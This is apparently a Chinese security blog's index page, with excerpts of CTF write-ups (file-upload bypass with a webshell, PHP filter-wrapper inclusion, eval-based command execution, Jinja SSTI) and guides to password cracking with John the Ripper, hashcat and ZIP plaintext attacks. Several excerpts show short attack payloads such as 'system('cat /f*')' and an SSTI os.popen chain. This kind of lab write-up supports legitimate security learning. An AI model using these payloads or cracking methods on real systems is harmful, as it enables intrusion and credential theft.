梦~醒🥝
linux、windows密钥暴力破解工具john的使用
[TOC] 什么是john John the Ripper 是一款大受欢迎的、免费的开源软件。也是一个基于字典的快速破解密码的工具,是一款用于在已知密文的情况下尝试破解出明文的破解密码软件,支持目前大多数的加密算法,如 DES 、 MD4 、 MD5 等。 John the Ripper 支持字典破解方式和暴力破解方式。它支持多种不同类型的系统架构,包括 Unix 、 Linux 、 Windows 、 DOS 模式、 BeOS 和 OpenVMS ,主要目的是破解不够牢固的 Unix/Linux 系统密码。 john一般是kali自带。 john参数表 john 命令的具体参数选项如下表: 选 项 描 述 –single single crack 模式,使用配置文件中的规则进行破解 –wordlist=FILE–stdin 字典模式,从 FILE 或标准输入中读取词汇 –rules 打开字典模式的词汇表切分规则 –incremental[=MODE] 使用增量模式 –external=MODE 打开外部模式或单词过滤,使用 [List.External: ...
BurpSuite中文版出现显示错位情况解决
问题描述 ​ 在使用BurpSuite汉化版时抓取http数据包出现显示错位情况,这是因为中文版的字体不一样导致的,需要修改字体。 解决方法 ​ 修改BurpSuite汉化版的http字体显示。 打开设置,在message editor中找到“HTTP消息的显示方式”,修改如下
刷题2025.3.15
题目来源:NSSCTF平台 [TOC] [SWPUCTF 2021 新生赛]easyupload2.0 考点:文件上传绕过 进行文件上传测试,首先上传jpg文件,然后抓包改成php文件,结果提示php文件不能上传。 上传htaccess文件也不行,于是改成后缀为phtml。 phtml也会被当成php解析。 发现上传成功,用蚁剑连接,找到flag. NSSCTF{76333d4d-efe1-4a18-acf5-09bd35c8ca3b} [SWPUCTF 2021 新生赛]PseudoProtocols 考点:PHP伪协议,文件包含 先扫一下目录,发现什么都没有,然后看到需要传参,又要读取hint.php,使用filter伪协议 1php://filter/read=convert.base64-encode/resource=/var/www/html/hint.php 得到一串base64,解码 12345PD9waHANCi8vZ28gdG8gL3Rlc3QyMjIyMjIyMjIyMjIyLnBocA0KPz4=<?php//go to /test2 ...
Git问题:解决“ssh:connect to host github.com port 22: Connection timed out”
[TOC] 问题描述: 在某一天使用hexo d命令时突然出现报错: 1ssh:connect to host github.com port 22: Connection timed out 之前都是可以链接的,后来换了地方突然链接不上github了。 问题分析: 根据错误提示知道,连接不成功可能是: 网络问题 ssh密钥需要重新添加 22端口被占用 根据此进行尝试解决,应该能解决。我就是第三个问题 解决方法: 情况一: 检查网络连接情况,检查代理是否开启。然后ping一下看看。 1ping github.com 情况二: 直接重新添加ssh密钥就行 情况三: 这也是我的情况,可能是22端口不行或者被占用,就需要换个端口。 操作方法: 1.进入~/.ssh下 1cd ~/.ssh 2.创建一个config文件(这里我用的vim编辑器) 1vim config 3.编辑文件内容: 1234567891011121314Host github.comUser gitHostname ssh.github.comPreferredAuthentications publickeyIde ...
本地搭建deepseek
准备阶段 先下载Ollama和chatbox安装包 12Ollama: https://ollama.com/chatbox: https://chatboxai.app/zh 在电脑上安装后即可 搭建步骤 安装之后,按win+r,输入cmd进入命令框 然后我们在回到ollama的官网: 复制后面的代码到命令框下载,等待它下载完 然后打开chatbox,选择使用本地模型 模型位置点击三角形位置选择安装好的deepseek模型,上下文消息数量20那个位置记得选择不限制。 根据自己喜好设置其他选项,点击保存,然后就可以试试对话了。 至此初始化就完成了,基本的功能就完成了。 启动注意事项 每次在chatbox启动的时候,都要先在命令框输入 12ollama list #查看modeollama run modename #运行mode 然后才能在chatbox本地使用。 否则会报错没有网络。
CTFHub技能树-rce
[TOC] eval执行 1234567 <?phpif (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]);} else { highlight_file(__FILE__);}?> 没有任何绕过,直接执行 12?cmd=system('ls /');?cmd=system('cat /f*'); ctfhub{953435d20ae6652047e620c4} 文件包含 审计代码,发现过滤了flag关键字,include包含文件的内容,根据提示,发现有个shell.txt文件,而且文件内容是接受传参请求,可以利用这个漏洞。 所以思路就是文件包含shell.txt文件,然后传参触发eval函数来rce。 1?file=shell.txt&ctfhub=system('cat /f*'); ctfhub{e95bf56ca09c475de96779f8} ...
两种明文攻击
一、完整的明文文件 要达成明文攻击需要注意以下三点 ①完整的明文文件 ②明文文件需要被相同的压缩算法标准压缩(也可理解为被相同压缩工具压缩) ③明文对应文件的加密算法需要是 ZipCrypto(ZipCrypto又分为ZipCrypto Deflate/ZipCrypto Store) 使用ARCHPR进行明文攻击 破解时长应该不超过5分钟,运行至5分钟左右可以手动停止,ARCHPR会跳出来破解出的三个key。当然,这个结果并不是压缩包的密码,而是一个去除密码的压缩包xxx_decrypted.zip,把这个文件直接解开就可以了。 用以上方法需要已知一整个明文文件。 二、已知一部分明文 使用rbkcrack只需要知道加密压缩包内容的连续12个字节,即可进行攻击破解。同时,结合各类已知的文件格式,更扩宽了ZIP已知明文攻击的攻击面。 rbkcrack下载地址: https://github.com/Aloxaf/rbkcrack rbkcrack常用参数 1234567-C 加密的压缩包-c 压缩包内加密的文件-p 明文内容-k 输入key-o 偏移量-d 攻击完成后导出解密文件-u ...
2024年春秋杯网络安全联赛冬季赛wp-1.19
[TOC] web easy_php 考点:文件上传绕过,截断,源码审计 打开网站后,可以下载源码,先下载源码,然后再扫一下网站目录 配合源码审计,审计过程省略。其中在文件上传的目录下已经有文件了,再结合提示可以知道,不用再自己上传文件。 那么就需要触发文件,看这里代码 可以知道在/file.php页面中可以进行url的get传参,然后会将参数值过滤后进行高亮,触发反序列化链。 但是这里的过滤中,是f1ag而不是flag,所以其实没有过滤flag关键词。 因此结合源码,直接构造payload: 1?file=/flag 1flag{a16dcb7549915546893a27a6d7927615} easy_code 考点:利用PHP特性绕过,filter伪协议 访问/robots.txt 可以看到有 gogogo.php ctfer 参数有三个检测,只需要用科学计数法,PHP 会自动四舍五入 1ctfer=6.66999999999999999999999999999999999999999e2 Hackbar 里设置 cookie 为 p ...
2024年春秋杯网络安全联赛冬季赛wp-1.18
Weevil’s Whisper 考点:流量分析,代码审计 下载附件,进行流量分析,看到上传的代码 进行代码审计可以知道,在http中的返回结果是由$p$kh$r$kf组成的,而$p,$kh,$kf是固定的,所以可以提取出来$r。 再看代码,$r是$o进行一系列加密而成,而$o就是执行完成后返回的结果,所以只需要写脚本反解$r就能出现结果。 exp: 提取$r的脚本: 123456789101112131415161718192021222324252627282930313233343536373839404142import re# 示例字符串列表strings = [ "lFDu8RwONqmag5ex45089b3446eeSaoCUFRXAGExNS5kaQ==4e0d86dbcf92", "lFDu8RwONqmag5ex45089b3446eeSaoCUVRSBofUNDFgR2Uu4e0d86dbcf92", "lFDu8RwONqmag5ex45089b3446eeSaoyZWJkN2U=4e0 ...
hashcat常规使用方法
-m hash的类型 指定hash的加密类型,默认是MD5类型 在对应的类型前面有它的id,可以通过id来指定类型 当我们想要找一个类型在hashcat支不支持的时候,例如windows系统加密的是NTML,可以执行命令 hashcat64.exe -h | findstr NTLM 可以看到NTLM的ID号为1000 -a 攻击方式 破解密码的方式 分别有: highlighter- 1c 123450 | Straight 字典破解1 | Combination 组合破解3 | Brute-force 掩码破解6 | Hybrid Wordlist + Mask 混合字典 + 掩码7 | Hybrid Mask + Wordlist 混合掩码 + 字典 掩码 当没有字典的时候,可以使用掩码指定密码的每一位是什么类型的字符,首先我们知道密码有多少位 例如:?d?d?d?d?d?d?d?d代表密码为8为数字,?u?l?l?l?l?d?d?d代表密码为7位,首个字母大写,然后四个小写字母,最后三个数字 破解windows hash密码 使用字典爆破windows ha ...
2024年春秋杯网络安全联赛冬季赛wp-1.17
[TOC] web easy_flask 考点:ssti 注入 打开网页,发现有个登录,试试直接登录 看到 url 处是进行 get 传参,试试 111 联想到 ssti 漏洞,于是用9验证一下,发现就是 ssti 模板注入 进行 ssti 模板注入漏洞一系列,构造 payload: 1{{cycler.next.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} flag{48ad0cde8345c8b2608933ac4e85147e} file_copy 考点:无回显,filter协议 根据代码,可以看到是post传参,参数是path。(抓包也可以看) 直接使用脚本(https://github.com/ProbiusOfficial/PHPinclude-labs/tree/bbb08b030623d481be51edea063433b8d77b2ee7/Level 17/php_filte ...
解决hexo引入图床,手机和web不显示图片的问题
0.前言 hexo引入图片的方式有很多种: 从本地文件加载,方法参见参考文献一。 使用图床,markdown中直接引用图床的链接。 1.问题描述 Hexo使用图床的方式加载在blog中加载图片,会在非本人的电脑或者手机端报“html访问图片资源403问题(http referrer)”,导致采用图床方式加载的图片全部无法加载。 2.问题原因 http请求体的header中有一个referrer字段,用来表示发起http请求的源地址信息,这个referrer信息是可以省略但是不可修改的,就是说你只能设置是否带上这个referrer信息,不能定制referrer里面的值。 服务器端在拿到这个referrer值后就可以进行相关的处理,比如图片资源,可以通过referrer值判断请求是否来自本站,若不是则返回403或者重定向返回其他信息,从而实现图片的防盗链。上面出现403就是因为,请求的是别人服务器上的资源,但把自己的referrer信息带过去了,被对方服务器拦截返回了403。 在前端可以通过meta来设置referrer policy(来源策略),具体可以设置哪些值以及对应的结果参考这 ...
avatar
🐟认真摸鱼中
梦~醒🥝
往前走,别回头🍭🍭🍭
前往小窝
公告栏
--- 主域名 ---
blog.m3x1.cn | blog.m3x1.fun
--- 备用域名 ---
备用1
cloudflare.m3x1.cn
--- 网站安卓APP ---
🍧点此下载(暂无)🍧

空降评论复制本文地址
随便逛逛昼夜切换阅读模式关于博客美化设置切换全屏打印页面